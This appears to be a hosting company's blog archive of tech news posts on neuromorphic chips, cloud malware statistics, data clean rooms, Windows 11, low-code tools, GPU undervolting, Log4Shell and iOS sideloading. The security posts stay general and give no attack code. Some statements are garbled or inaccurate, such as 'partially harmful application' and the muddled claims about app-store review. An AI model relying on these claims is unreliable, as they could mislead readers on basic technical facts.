Brain Synapse Function Possibly a Part of the Next Generation of PCs

100 billion is an incredibly big number, and yet a fully developed human brain can have up to as many as 100 billion neurons in it as part of the extensive neural network that provides the brain with the framework it needs to be the amazing mega processor that it is. Much of the focus with A.I. in computers has been to replicate the function of the human brain as best as possible, and to date that’s happened with varying measures of success along with difficulty in measuring the criteria for that.

The key conduits in a brain’s neural network are synapses, and these are literally the bridges between cells along which bioelectrical impulses provide cognitions, impulses, feelings – pretty much and everything and anything that you might have rooted in mental function. Those impulses have their roots in the different cortex centres of the brain, and in much the same way they are found in the chips of computers and the sort. Up until now the relaying function of these chips lost something of its power and authenticity, but that may be a shortcoming that has a fix possibly arriving soon.

New developments of chips modeled after the brain’s neural network are really making waves based on what they can do for expanding on the capabilities of computing devices. Here at 4GoodHosting it goes without saying that this is a topic of interest for any Canadian web hosting provider or any other type of provider that has inherent interests when it comes to making devices capable of more while keeping them suitably compact and usable.

It’s certainly something that can reach out and be beneficial to everyone, especially when you think about what it’d be like to have computers that are as sharp as what we’re all lucky enough to have between our ears. It may be a reality in the not-too-distant future, and so that’s what we are going to look at this week.

World’s First Electrochemical 3-Terminal Transistor

All of this has to do with a new material that has been developed, an electrochemical 3-terminal transistor manufactured with 2D materials. The key component here is a titanium carbide compound called Mxene that takes classical transistor technology into a whole new stratosphere of transmission possibilities for transistors. The relevance is that it is the first electrochemical 3-terminal transistor manufactured with 2D materials.

This is what allows it to function more in line with how a brain would with maintain signal integrity and allowing it to have all the nuanced complexity that it needs to have. With these new chips the electrochemical random access memory (ECRAM) behaves as a synaptic cell in an artificial network, establishing itself as a 1-stop shop for taking data and then processing / storing it. Computers equipped with chips built this way could rely on components that can have multiple states, and perform in-memory computation in ways that would make current capabilities seem pedestrian at best.

Leading to Even More

The further belief among computing science experts is that the MXenes could be fundamental when it comes to developing neuromorphic computers that are closer in operation to human brains and immensely more energy efficient than today’s traditional computers – in same cases thousands of times more energy efficient to go along with all the more detailed and fine computational abilities. A good number of developers will be familiar with CMOS wafer assemblies where layers of 2D are integrated in silicon, and these new chips will do much the same with the 3-terminal transistors. What this will be is a true hybrid integration with the same back of the line processes.

What can be expected? For starters, these super chips would have write speeds that are upwards of 1000x faster than any other ECRAM that has been built to date. If one was to scale 2D ECRAMs to nano dimension the less than a nanosecond processing rate would make them as fast as the transistors in today’s computer so it’s reasonable to think it can fuse into our current computers using CMOS technology process.

That’s due to the 2D transistor metal materials being entirely compatible with CMOS fab process, and the belief is that within a decade users may be able to fabricate special purpose computer blocks where memory and transistors merge to make them at least 1000x more energy efficient than the best computers we have today. AI and simulation tasks could even have 1 million fold energy efficiency for certain algorithms. These new chips are eventually going to be seen in cloud computing services like web hosting and website builders.

The first commercial products with this kind of mega-powerful chip in it may still be a long way off, but industry experts are saying we might see offerings becoming available before the end of the 2020s.

Cloud Apps Responsible for the Bulk of Malware Downloads

Web security has improved in leaps and bounds over recent years, but as is always the case the interests on the other side of the fence have made their own advancements. Many people have been inclined to ask around what exactly is in it for the people who create malware and put it out there for infecting a person’s computing device, but as has been determined – and not surprisingly – it’s all about money like anything else. There’s a very complex network of interests there, and the long and short of it is that people benefit from having your computer, notebook, or mobile compromised very underhandedly.

And so it is that much of what makes the Cloud the godsend it has been for digital professionals is also what makes it the #1 risk factor for being infected with malware. In many ways it is a classic example of having no choice but to take the bad with the good, and it appears the competition between malware makers and cyber security experts is going to continue full tilt for the foreseeable future.

Here at 4GoodHosting we’re equally big fans of the Cloud in the same way it is for any good Canadian web hosting provider who has a seat that’s conducive to seeing digital advances in the clearest of lights. Further, you can’t stop progress and there’s no debate we’ll be looking to get more out of cloud computing so that extensive physical storage isn’t allowed to be as harmful as it would otherwise. So yes, we are all very much taking the good with the bad these days and many people will have already had one or more unpleasant experiences with malware.

Let’s look at this finding that most malware downloads are delivered via the cloud, why that might be, and what are the potential ramifications of it all for the average business or organization.

2/3 of All for 2021

A recent Netskope report based on the 2021 year found that no less than two-thirds of malware downloads were based in cloud apps. This puts a spotlight on the continued growth of malware and other malicious payloads that make their way to unsuspecting users through cloud applications. As you’d expect this was up markedly from the same percentage for 2020, and what it does make clear is reflect that attackers are having more success with seeing their victims infected with malware.

What it does is create the need for better Cloud security, and there’s one particular popular resource where it may bee needed more than anywhere elsewhere – Google Drive. Given the popularity of Google’s flagship Cloud Computing resource that isn’t going to be well-received news for people who are devotees when it comes to using it. But it is what it is, and of course the popularity of the app and the sheer number of people using it is a big part of why it’s #1 for malware infections.

It’s interesting to note that it usurped Microsoft OneDrive for the dubious title. OneDrive was the number one source for malware infections the year previous, although it’s hard to suggest that a major shift in user preferences was behind the bulk of that shift.

19 to 37% Jump

The increase in malicious Office documents was from 19% to 37% according to the report, and the size of the increase is large enough to suggest more in the way of far-reaching cloud application security risks. It also indicated further that more than 50% of all managed cloud app instances have been targeted by at least once credential attack over the course of the last year, independent of whether that attack was seen through or blocked. The number of attempts suggest there are more bad actors out there than ever before who are building malware and putting it in the position to be distributed via the Cloud.

The reality is now that Cloud-delivered malware is now more of an occurrence than web-delivered malware. For 2021 malware downloads originating from cloud apps were now making up 66% of all malware downloads in comparison to traditional websites. The exact number for that is up 46% from the beginning of 2020. This is in comparison to Microsoft Office documents moving up to account for 37% of all malware downloads by the end of 2021.

Some of the Microsoft Office malwares – including the well-known Emotet malspam campaign in 2020’s 2nd Quarter – triggered a rush of malicious Microsoft Office documents designed by copycat attackers who were riding the coattails of the Emotet campaign. Another interesting catch is that upwards of 50% of managed cloud app instances are targeted by credential attacks exclusively. And the reason for that? Credentials gained underhandedly are able to be sold and that gets back to what we stared with in asking why is it people do this.

Try Until Success

What these malware attackers and their bimbos do is try common passwords and leaked credentials from other services in order to obtain access to sensitive information that has been stored in cloud apps. Also interesting to note that some 98% of attacks coming from new IP addresses, indicating that’s very much a part of the M.O. in order to stay out of sight as best as possible.

We also know from this report and others that corporate data exfiltration is on the rise. Increasing numbers of employees take data with them when they leave an employer and this report also has instances in 2020 and 2021 where an average of 29% of departing employees downloaded more files from managed corporate app instances. Another 15% of users uploaded more files to personal app instances in their final 30 days of being employed.

This is noteworthy because it goes to show that effective cybersecurity can’t be 100% digital exclusively, and there needs to be quite a bit of better and more secure business practices as part of the protective equation too. Which is important, because as we’ve discussed all the goodness of Cloud computing and eliminating the need for physical storage isn’t going anywhere.

Next Generation Mechanical Keyboards Sure to be a Hit

Even if you don’t have the most dextrous fingers or type especially quickly you are probably like everyone else in the way that doing your job probably involves typing on a keyboard. But these days as we all know keyboards are for so much more than just pressing keys to enter text and we use them in many other ways to make personal computing more efficient. Customization and greater functionality is the name of the game with all computing components. Mechanical keyboards offer this and they’re not new to the market, but until recently they’ve been quite expensive and not as widespread available.

That’s soon to change and nearly everyone who uses a keyboard for work or on a regular basis is likely going to be quite thrilled with the new mechanical keyboards. They will likely stay on the pricey side, but for some people it will be a price well worth it if it increases the productivity of their work day and gets rid of nuisances they used to find with their old conventional keyboard.

This makes the cut as newsworthy here at 4GoodHosting in the same way we imagine it would for any other good Canadian web hosting provider, as it’s something that nearly everyone can relate to. That’s going to be true if you’re anything from a web master to a data entry clerk or a university student with plenty of papers to write.

So what’s the fuss and what can be expected with this new and vastly improved generation of mechanical keyboards?

All About Customization

The ability to customize these keyboards is what makes them so great. What they offer is a level of personalization that can transform your everyday typing experience into a much more pleasurable experience as well as facilitating greater productivity on your part.

The best of features with new-technology mechanical keyboards starts with the keycaps on top of switches. They communicate key presses to the PCB and when contact is made between a switch and the PCB then it is the PCB that transmits the input to the computer and this allows the key to deliver much more detailed digital information if that is what is formatted to do.

Next up these keyboards have stabilizers, and while they’re not as functionally superior they do offer a better user experience with the way they allow longer keys (spacebar, for example) to have more of an even feel across it when pressed. These keyboards also have a metal frame plate which gives them more stability and solidity, the value of which will immediately register with those of us who are well in advance of 100 wpm.

Other Favorable Features

The printed circuit board on these keyboards is a big part of their superior functionality too. You can customize these even further (for more price of course) with up to quadruple switches and super durable aluminum housing. The key customization options are huge for users who may not use English primarily and instead have a native language that relies on a script that doesn’t work well with a conventional keyboard layout.

With custom mechanical keyboard you’re able to opt in and out of whatever it is you like, or don’t like. You can even vary what type of switch or keycap you use for specific keys and experiment until you the feel and responsiveness that’s optimal for you.

Mechanical keyboards mean easy maintenance too, as the ease of customization means replacing failing elements is much easier than it would be with a conventional keyboard. This is especially true if they have hot-swappable keys, and most of them do.

Less Expensive Upgrades Too

With a custom board, changing out the switches or keycaps is more affordable. It’s relatively inexpensive to swap them for a whole different set. Industry hardware experts say it is likely that in the not too distant future there will be generic parts that are compatible across different makes, and the manufacturers do have something to gain if they make it so that users are more brand loyal if they have right-to-repair on these units.

If you’re reading this on mobile you can skip the next suggestion, but anyways who is on a desktop or notebook can look down at the keyboard in front of them and think how it could be improved. In a short while from now you may be evaluating how successfully that has been done for you.

Data Clean Room Software a Big Development for Brands & Businesses

It was inevitable that eventually data was going to become Big data, and the increasingly digital nature of being in business and doing business is ensuring that trend just becomes more and more pronounced all the time. The catch as been in being able to make data available to partner organizations while still safeguarding the privacy interests anyone may have in the data being shared, and one of the more interesting things on the horizon early in 2022 is data clean room software.

With data leaks and the fallout of them being so often in the news it’s easy to see why we can relate to the need for this here at 4GoodHosting. Like any quality Canadian web hosting provider we have smaller level customers who may well see the promise of this for their online business or venture too. Many companies are in the process of looking for equally effective ways to collect, share and analyze data without compromising on privacy.

This also goes well beyond compliance, as companies that can incorporate this new technology and then be able to turn to any user interest group and give them 100% assurance to data security is going to be at an immediate advantage. Demand for such a resource has been growing over recent year, and it may be that with data clean rooms it’s about to become attainable and commonplace.

So what is the hype about, and what exactly is a data clean room? That’s what we’re going to look at with this week’s entry.

What’s a Data Clean Room?

A data clean room is a piece of software that allows brands and their partners to share data and gain mutual insights without compromising the privacy of the users’ data. Specifically it means not sharing any personally identifiable information or raw data with one another and in this way the data clean room serves as something of a neutral 3rd-party in major level affairs much like Switzerland would be if you wanted to use a geopolitical analogy.

At present there are 2 primary types of data clean room solutions available in the sharttech industry: The first ones are called walled gardens solutions and independent solutions is the other one, and both of them have advantages and drawbacks.

The question then become how this benefits a brand in particular, and to answer that we need to look at what consumer expectations have grown to become. What we do know is that consumers have become accustomed to certain type and level of user experience when it comes to brand interaction – most notably with seeing personalized, relevant content within an app and the type which has to this point been facilitated by access to user-level data.

Prime examples of this are cookies on the web or identifiers on mobile devices.

Unfortunately it has been that the exchanging of user-level data in this way has created the privacy problem that exists today. Consumers are rightfully asking to know how their data is being shared and with data clean rooms that allows the answer to be very different when that answer is being given honestly.

Experience Meeting Privacy without Compromise

AppsFlyer’s Privacy Cloud is a good example of this technology having been introduced, and with it and other data clean room solutions consumers will still get the great value and experience they expect from brands. But they’ll do so without any privacy concerns around how their data is being used. The catch is that any compromise on either end of the spectrum – customer experience or privacy – is going to be even more detrimental simply because of the inflexibility people have with either reality.

All of this takes on greater relevance when we consider that 3rd-party cookies are on their way out, and data clean room are already being earmarked for being a big part of filling that role so that user experiences can be optimized without sensitive data being put at risk. This is all because data exchanged between brands and partners continues to be the basis for accurate and actionable measurement.

The type of measurement which enables both sides to grow their businesses and give better experience to the end users. Up until now, however, this data exchange has been done based on user-level data only. What the data clean room does is provide a solution that maintains the great value and customer experience currently enabled by cookies, identifiers, and other user-level data – but doesn’t introduce the same privacy concerns that they wouldn’t be able to look past previously.

Additional Use Cases

Data clean rooms are already in use for operations in various industries. The way they provide secure environments where multiple parties can collaborate on sensitive and restricted data sets makes them very appealing, and you’ll find them in healthcare and life sciences, fintech (financial technology) insurance, fintech and other domains where sensitive data such as personal identifiable information (PII) has to be shared between multiple parties to perform analyses and generate insights.

Using AppsFlyer’s Privacy Cloud as an example again, what it does is let customers and partners keep up and be following all the various privacy regulations and guidelines but still getting the accurate insights they need in order to operate their business with maximum efficiency as well as best facilitate its growth.

And while other existing data clean rooms may have certain limitations, most are still going to have a lot of appeal for many. It should still be said though that data clean rooms from walled gardens have no cross-channel access, resulting in 1st-party date being mostly shared with their own data sets. Other ones may be limited to 1st-party data granularity as well as smaller partner ecosystems.

The biggest issue though is how it doesn’t have enough expertise with generating insights that the marketer needs, and there is almost always a need for aggregated reporting that is well suited for both business users and marketers.

Introducing Homomorphic Encryption

Homomorphic encryption enables the accurate generation of aggregated insights about the encrypted data, while not decrypting it at all. By remaining fully encrypted all the time it becomes a ‘zero trust’ technique where even the operator of the data clean room isn’t able to access the plain data. It uses a public key to encrypt the data, and of course that’s nothing out of the ordinary. What is different is how homomorphic encryption uses an algebraic system to allow functions to be performed on the data while it is in the encryption process.

Once that’s done then only the individual with the matching private key can access the unencrypted data after the functions and manipulation are complete. This means data remains secure and private even when someone is using it.

Bigger picture data clean rooms should be better for marketers to understand the real impact of their investments with more concrete evaluations of conversions and incrementality-based solutions being used test and control groups to isolate many affected variables. This will help marketers to optimized their efforts without putting shared data necessary for that into jeopardy if there’s any inherent security flaw or risk in the infrastructure.

Coming Windows 11 Update Set to Make OS Run Better on Lesser Hardware

Even if you’re a Mac person it is not difficult to see why the Windows OS is the dominant one all across the board. And truth is most people are not firmly in one camp or the other when it comes to their computing devices of choice. Mac is always going to be preferable for people who use theirs for creative purposes too, but PCs are going to be the same way for people who are all business and work related for the most part.

One of the things that has been noteworthy recently is how some companies – And Apple most notably – are now starting to make replacement parts available as part of the Right to Repair movement that is growing in strength due to how much e-waste is being generated and how electronic devices of all sorts are being made with planned obsolescence in mind. Microsoft isn’t doing the same with parts but one of the big aspects of the coming Windows 11 update is that the OS is going to now be able to run better on older and more low-end hardware.

In that sense it’s in line with the same ideas, and of course this is a good thing. So many possible examples as to why, but look no further than the thousands of old PCs that are repurposed for education in 3rd world countries and the like. This is not the only aspect of the update that should be talked about, but it is one that we can definitely support here at 4GoodHosting and we’d imagine any good Canadian web hosting provider would feel similarly.

More on Build 22526

Right now the Windows 11 Build 22526 is only available to members of the Microsoft Insider early access program, but it is introducing a number of fixes and enhancements. Many, however, are relatively minor but one worth mention is how Microsoft is using the latest build to experiment with a new approach to indexing file locations. They hope this will help users hunt down important files more quickly in File Explorer.

The reason we mentioned this one is despite the performance improvements seen over the course of recent updates, File Explorer is still just as sluggish and prone to crashes as ever. And for many among the frustrating issues the worst is when utilizing the search functionality. If often takes way too much time to return relevant results, especially if the person is choosing to store a large number of files on their local hard drive.

What’s going to change here is the newest update is going to make sifting through large quantities of files quite a bit faster, and the idea is that will allow people on lesser devices to be more productive with them. Users running Windows 11 on older, less powerful hardware, will now be less likely to suffer performance dips and longer load times.

Other Improvements

Superior file indexing is not the exclusive improvement ushered in with Windows 11’s latest build. We have seen that other upgrades include support for wideband speech when using Apple AirPods that are likely to improve audio quality for voice calls and a new and improved approach to the familiar Alt + Tab Hotkey functionality. Enterprise customers will also like how Microsoft has enabled its Credential Guard service by default, and the way it shields sensitive data behind a layer of virtualization-based security is something that’s very needed in today’s digital operating space for businesses.

In closing here we should mention that the latest Windows 11 build is currently only available to Dev Channel members. This is because there will be 2nd level fixes on the way and these individuals are ones who have opted to receive the most unstable features in advance. It is not known when the new features will make their way into a public build but signs are promising for anyone who’s had issues with an older PC and how well it works with File Explorer.

Slowing the Low Code Hype Train

Here we are with another new calendar year opened up, and you’ll be forgiven if January ’22 has you the same you were at this time last year with some sense of bewilderment at how developer technologies and methodologies are expanding in leaps and bounds. Part of that has been low-code technology, one that was forecast to have gains in application around 22% for 2021 and by all indications did that at the very least. It’s also estimated that by 2025 70% of new applications will be built with low-code or no-code technologies.

What we have on the plate today is 3rd generation low-code technology that’s improved on the 2 preceding generations of it. It gives enterprise that ability to build anything from the simplest to highest complexity applications and scaling them to whatever extent needed without limitations. It’s also known for providing built-in controls and functionalities required for enterprise governance while fostering more collaborative team working environments too.

It is conducive to the type of digital applications enterprises need to be able to create quickly and then easily adaptable as they fit needs that may be changing. Here at 4GoodHosting we imagine we’re like any good Canadian web hosting provider in that we’re able to see the real relevance in that and accordingly why there’s so much hype about low code and applications that are built around it.

But perhaps there’s reason to pull on the reins a bit there

The Pros

Low code can be helpful for building an MVP and fleshing out concepts within a small scope with precise product requirements and an understanding any scaling will be limited. But many times as project progresses there is the need to upgrade the processes. Without low-code solutions your ability to scale is very limited, and it can also be more costly too.

Then from the developer’s perspective choosing low code to complete small-scale projects and prototypes or build basic solutions is almost always faster and with fewer hiccups. Keep in mind though that most professionals will prefer to code from scratch when working on complex on account of the flexibility that provides for them. While the chance that a low-code platform won’t allow you to create a product meeting new or changed requirements will exist, that’s usually no deterrent.

Scalability really is the key benefit for low-code development, and the opportunity for and cost of horizontal and vertical scalability are primary factors when a vendor is being chosen. The benefits for accommodating changing numbers of daily active users, available features, storage, and expanded computing power are considerable and weight heavily in favour of this type of development.

It also allows you to escape being overruled by AI when a site experiences a large of influx of visitors and you would otherwise have access limited and / or forced to upgrade. This a huge issue in the SaaS sector right now and it’s one that’s pushing developers there to have greater interest in going low-code moving forward.

The Cons

Starting at the start here with the drawbacks to building with low code, it is extensive training requirements. There’s usually a lot that goes into implementing a low-code solution and how that usually manifests itself is in significant delays in deployment. For many people the foreseeing of this is what leads them to stick with agile development in order to get to market in a timeframe that’s been envisioned for the product.

The next issue here is timeframe variances related to other factors aside from development tools and methodologies. Ones that vary from weeks to months and will depend on the quality of the available documentation and support. The fact there isn’t an industry standard means every platform will have its own unique system. If an industry standard did exist that would change things instantly, but of course the question who would define that, based on what criteria, and what authority to do so?

Troubleshooting is difficult with low-code development too. When something goes wrong it a successful remediation will depend on the quality of the documentation, the response speed, and the competence of the dev team and their support. Debugging a program built with low-code may be difficult or flat-out impossible too, and vendor lock-in is a possible negative too if the solution will not be compatible with any other competitor or similar provider.

You may need to depend on the vendor’s platform to work, and you may only be able to make use of it as a backup. Plus migrating to another service is many times nearly impossible. You may well have to start over again from scratch.

One Tool Like Others

The simplicity and scalability of low code make it appealing, but it shouldn’t be seen as the be-all solution that should be rolled out by default in every task instance. Make sure you have a deep understanding of the niche you’re working in to foster strong understanding of the demands for the product you’re building and how they might be tested against a vendor’s capabilities.

Pros & Cons for Undervolting Graphics Cards

Hoping that everyone is enjoying the holidays, had a good Christmas, and has an enjoyable NYE 2022 on deck. During the Xmas holidays a lot of people find time for entertaining themselves that’s not as easily found during the rest of the year. For some people that entertaining is best done via their computer, and for many there’s nothing better than enjoying games. They’ve come a long way over the last decade +, and usually in order to get all the visual pop and immersive experience the game developers want you to have you need a good GPU.

Lots of people are perfectly fine with the one that came in their desktop, and not many of them will be the type inclined to perform invasive surgery on computing devices in the first place. For others with the know how and no hesitation to perform ‘tweaks’ it is possible to make small changes to computer components that will alter how they function. One of these procedures that gamers will probably at least have heard of is undervolting the GPU. To describe in plainly, it means to restrict the power that the card has access too and gain specific performance benefits because of it.

This is not something that would generally be among the familiarities for a Canadian web hosting provider, but here at 4GoodHosting we are good at identifying what might be of interest for people who are tech-savvy in this way, and it turns out that undervolting isn’t especially difficult to do. So it’s something that might be possible for you if you’re an avid gamer, and what we’ll do here with the last entry for 2021 is talk about advantages and disadvantages to undervolting graphics cards.

Efficiency Boost

Your GPU is going to have a few important calibrations that are open to manual adjustment with software like MSI Afterburner. These include power limit, core and memory clocks, plus the voltage. The entirety work in unison to provide the performance and power needed for what’s expected in regard to out-of-box operation.

So what exactly is undervolting? Simply, it is a reduction of the voltage your GPU has access to and the primary aim is to maintain the performance associated with stock settings while at the same time boosting efficiency. Undervolting takes specific aim at power draw and heat as areas where improvements can be made.

The first question is this then; if a GPU is able to run better at a lower voltage, why wouldn’t the manufacturer build them with this in mind? The answer is that silicon can vary with each individual GPU and some will tolerate different voltages and clocks better than others. Standard settings will be aligned with whatever is known to be the average tolerance.

The most noticeable differences will be with a GPU that’s built to be power hungry, and the Nvidia RTX 30-series Founders Edition is one of them. Undervolting this card may offer many improvements, especially in challenging applications. A lower-power GPU will put out less heat so you’ll have less to gain undervolting a GPU card like this.

Pros / Cons for Undervolting

We should start by saying that most of the time it will actually be best to leave your GPU at stock settings. Some users will also choose to use an automatic overclocking tool as a cost-effective and simply implemented tool for regulating graphics card performance.

Pro 1: Lower power consumption will promote lower heat. This means a reduced power bill, even if it’s not much lower. Less heat can also equate to better thermal performance for your other surrounding components like the CPU. Modern GPUs tend to come with plenty of power, so undervolting can be very beneficial for mitigating the effects on your PC ecosystem. Plus your power supply will be less stressed.

Con 1: You’ll need to spend time familiarizing yourself with settings on the GPU. While undervolting is not especially difficult, it does require some knowledge and ability to tinker around effectively and neglecting that may mean you do permanent damage to the GPU.

Pro 2: Familiar software like MSI Afterburner makes it free to do, and generally it’s not too risky. Keep in mind as well that undervolting may also help prolong the life of your GPU because it will be under less thermal stress over time.

Con 2: Further tinkering may be required in the future. New driver updates or changing ambient temperatures are two of the reasons you may sometimes have to go in and adjust your settings for optimal performance.

Pro 3: Undervolting is ideal when you’re fitting a powerful GPU into a small form factor enclosure, because it makes it a much better experience. Small cases are usually more restrictive for heat dissipation, so you’ll enjoy better thermals in these smaller spaces while performance isn’t compromised like it might be with a CPU that hasn’t been undervolted.

Con 3: You may end up applying incorrect settings without being aware of it, and poor performance results. If insufficient voltage to the GPU occurs or it isn’t properly applied there may be overall instability and reduced frame rates. Double checking and testing your GPU performance to insure it’s improving with voltage changes is always a good idea.

Pro 4: Less noise. The lower voltage will make it so that the GPU fans can spin at lower RPMs with the accompanying reduced heat. This also means less power is needed for the fans, and that keeps the entire system performing at a lower noise level.

Rent Out Computing Power for Access to Apps and Services

There’s the old expression ‘take only what you need’ and it’s good advice to follow in all sorts of situations. It may be followable when you’re at an all-you-can-eat buffet and you’ve eaten all you can, but when it comes the processing power in your computers at home you get what’s given to you when the device was put together. Some people put the entirety of that processing power to work for them, but most people don’t use anywhere near the total of it. And in truth the majority of people may not even know what it is they actually have at their disposal.

Some will though, and it’s these people who will want to take note of a new decentralized Internet platform that will let people pay for their apps and services by making their idle computing power available to those who could put it to use. As a quality Canadian web hosting provider, this is something that resonates with us here at 4GoodHosting because like any host we can relate to what it’s like to have real constraints based around this and in the industry there’s been much in the way of roundabout talk along the lines if something like this might become possible someday.

It has made a lot of sense for a long time, but like many things it takes time to get the wheels sufficiently in motion to see things start to happen. But that’s what’s happening now with Massive, an app monetization startup that’s set to make some serious waves.

Smart Decentralization

Massive has just recently closed a $11 million seed round, which will let it move forward with a monetization software development kit that will be able to support the project and move forward with s small yet noteworthy step in decentralizing the internet and making it possible for people to pay for apps using their idle compute power.

This is an impressively unique potential solution, one that will benefit the individual consumer but also improve on how app developers and service providers make money for the work they do. As it is now they usually charge users money, and it’s fairly standard to have a 1-time app download fee or subscription services that come with a monthly charge. There are some who want to make their work free to the public and will set up their compensation by means of an implementing on-screen ads, and nearly everyone will know the type from using the apps they have.

This is especially common for mobile games and sometimes it is preferable because upfront costs often turn off new customers. But ideally most people will enjoy an ad-free experience, and that may be what’s soon to be possible if people have the means of renting out their CPU power.

Expanding on Distributed Computing

What is being proposed here is taking the concept of distributed computing – utilizing extra CPU cycles on otherwise idle machines- and reinventing it as a legitimate payment method. Looking at how it works it is not unlike to individuals can rent their unused vehicles and homes on Turo and Airbnb. The unused compute power is exchanged for a passive means of paying for apps and services already being used and enjoyed.

Some might say this will sound a little invasive because the space and power is going to be utilized on a personal device, and it may be for those who aren’t familiar with distributed computing. However, Massive is adamant that it will be putting a priority on security and digital consent, with promises on their website that users will need to opt into the model to participate plus able to opt out at any time.

They’re also very upfront about their wish to be a part of dismantling the internet’s reliance on nosy marketing practices. The idea is that this new arrangement opportunity will reduce the amount of personal information users unwittingly give away, and it is true that antivirus protections are going to be thoroughly incorporated into Massive’s CPU-sharing software.

They are working with third-party partners to this model to customers, but as of now Massive is only compatible with desktop apps. Plans are in the works to bring this opportunity to Mobile, although that may be a good ways down the road. Currently more than 50,000 computer users have already opted in, and that’s a very strong reflection of the high level of interest there’s going to be from people who like the idea of ‘bartering’ in a way for their apps and services.

New Log4Shell Open-Source Apache Software Vulnerability a Major Problem

It has certainly been a while since we’ve had a nasty bug making enough of a stink that it warrants being the subject of one of our weekly blog posts, but here we are again. The good thing has always been that these software vulnerabilities are usually quite limited in the scope of what they’re capable of, and that means they usually don’t get much fanfare and they’re also usually fairly easily dealt with via patches and the like.

The problem becomes when the bug is rooting in software that is ubiquitous as far as being used in cloud serves and enterprise software used as much for government as it is in industry. That’s the scenario with the new Log4Shell Software Vulnerability that has the Internet ‘On Fire’ according to those who are qualified to determine whether something is on fire or not. All joking aside, this is apparently a critical vulnerability in a widely used software tool, and – interestingly enough – one that was quickly exploited in Minecraft.

But now it emerging as a serious threat to organizations around the world, and here at 4GoodHosting like most quality Canadian web hosting providers we like to keep our people in the know when it comes to anything that’s so far-reaching it might apply to a good number of them.

Quick to be Weaponized

Cybersecurity firm Crowdstrike is as good as any for staying well on top of these things, and reading what they have to say about Log4Shell is that within 12 hours of the bug announcing itself it’s been fully weaponized. That means that tools have been developed and distributed for the purpose of exploiting it. Apparently all sorts of people are scrambling to patch, but just as many are scrambling to exploit.

It’s believed this software flaw may be the worst computer vulnerability to come along in years. As hinted at, it was discovered in a utility that’s ubiquitous in cloud servers and enterprise software used across industry and government. If allowed to continue unchecked it has the potential to enable criminals, spies, pimps and programming novices alike for no-hassle access to internal networks.

Once in they can loot valuable data, place malware, wipe out crucial information or do a whole lot of other types of damage. And it seems to be that many different kinds of companies could be at risk because their servers have this utility installed in them and we’re still in the early stages of fallout with this.

Cybersecurity firm Tenable goes one step further in describing it as ‘the single biggest, most critical vulnerability of the last decade’ and maybe even the biggest one in the history of modern computing.

10 / 10 Cause for Alarm

We also have Log4Shell being given a 10 on a scale of 1 to 10 for cause for alarm the Apache Software Foundation, which oversees development of the software. The problem is that anyone with the exploit can obtain full access to an unpatched computer that uses the software, and specifically said the extreme ease the attacker has with accessing a web server through the viability and without a password is what makes it such a major threat.

A computer emergency response team in New Zealand was the first to report of the flaw being actively exploited in the wild just hours after the first patch was released in response to it. This was weeks ago now, and the hugely popular online game Minecraft was where the first obvious signs of the flaw’s exploitation were seen, and the fact the game is owned by Microsoft shouldn’t be overlooked.

It’s been reported at the same time that Minecraft users were already using it to execute programs on the computers of other users by pasting a short message in a chat box. Apparently a software update form game users followed shortly after and customers who apply the fix are protected. But the ‘fire’ isn’t contained by any means – researchers reported finding evidence the vulnerability may also be exploited in servers operated by companies like Apple, Amazon, Twitter and Cloudflare.

The Case Against Sideloading Apps onto iOS

Android and iOS are definitely two entirely different worlds when it comes to the default choices between mobile devices, and you’d have trouble finding any more than just a few people who don’t take advantage of apps for their smartphones nowadays. Depending on who you are that may be for entertainment or personal pursuit aims, or it may be for making your workdays that much more productive and streamlined. All sorts of possibilities out there for what you can do with apps and it sure is a whole lot different from where we were just 10 or so years ago.

Once you’ve got a taste for them it’s hard to go back, and you won’t want to be thwarted in your attempts to get one into your device if you see the need for it. The reason that sideloading apps – installing apps without getting them from office

ial sources (namely Android Market or the App Store) – is as popular as it is because both Google and Apple have been fairly free with allowing certain carriers to block certain applications based on model and network. There’s plenty of people with phone only a couple years of old that are already encountering roadblocks, and sideloading the app allows them to get around that.

In the bigger picture though it’s not good for the development of better app versions in the future, as those developers don’t get what they should for their work and that’s something we can relate to in a roundabout way as a good Canadian web hosting provider. We certainly know all that goes into allowing people to enjoy the digital connectivity they do nowadays.

So not to pick sides, but recent information seems to suggest that sideloading apps for Android is not so bad as it might be for iOS devices. Let’s look at why that is.

Privacy & Security Concerns

Apple has come right out and made it clear that there’s plenty of evidence indicating sideloading apps through direct downloads and 3rd-party app stores would weaken privacy and security protections that have made their iPhone as secure as it’s been regarded to be all these years. They’ve even sent a letter to US lawmakers raising similar concerns about legislation that would require app store competition and mandate support for sideloading.

The focus here is more on sideloading apps installed by users on a device without the involvement of a trusted intermediary performing oversight function, at least to some extent. It is true that downloading an iOS app from a website and installing it isn’t the same as downloading one from an app store operated by Google or Microsoft. Whether a 3rd-party app store might offer better security and privacy than the official app stores is a legitimate question.

A lot of the concerns will be based around the fact that Apple only spends an average of 12 minutes or so reviewing each iOS app. Apps offered elsewhere than the iOS app store may be backed by a more detailed app review, and better for disallowing all third-party analytics and ad SDKs. Long story short apps that cost more elsewhere might be worth it after all, but generally you’re not going to find any versions of such being available for sideloading anyways.

Android Difference

A part of why Apple disapproves of the sideloading is in user interests as it believes that Android has poor security because it supports sideloading. It is true that a survey found that Android devices have 15 to 47 times more malware infections than iPhone, so there is some truth to this although the size of user base has to be taken into consideration too.

To be fair though Apple does not put out a Transparency Report the way Google does for Android. Security issues may be more visible on Android than iOS, but that is a reality of iOS being less accessible to researchers. According to the most recent version of that report, only about 0.075% of current Android devices running 11 during 2021 Q2 had a PHA (partially harmful application), and that would include devices that sideloaded apps.

It does need to be said though that security issues on Android are a reflection of Google’s inability to force operating system upgrades on devices sold by other vendors. As a results older Android versions with vulnerabilities hang around the market longer. That’s a consequence of Android’s multi-vendor ecosystem rather than the perils of sideloading.

The Case

  • The risks that a person could assume if they sideload apps onto an iOS device:
  • Greater numbers of harmful apps reaching users due to the ease for cybercriminals to target them this way, and especially including sideloads limited to 3rd-party app stores.
  • Users having less up-front information about the apps to make informed decisions about whether or not to add them to the device, and less control with those apps once they’re on the devices.
  • Protections against third-party access to proprietary hardware elements may be removed, and non-public operating system functions may be distorted or misaligned.
  • Sideloaded apps needed for work or school may have put users at a direct disadvantage

Other Considerations

Another thing to keep in mind is that sideloading does increase the attack surface in iOS at least to some extent, although to be fair the App Store has had more than a few scam-geared and insecure apps themselves over the years. The security afforded by iOS is a legit benefit, largely due to security features built into the operating system, like app sandboxing, memory safety, permission prompts, and others.

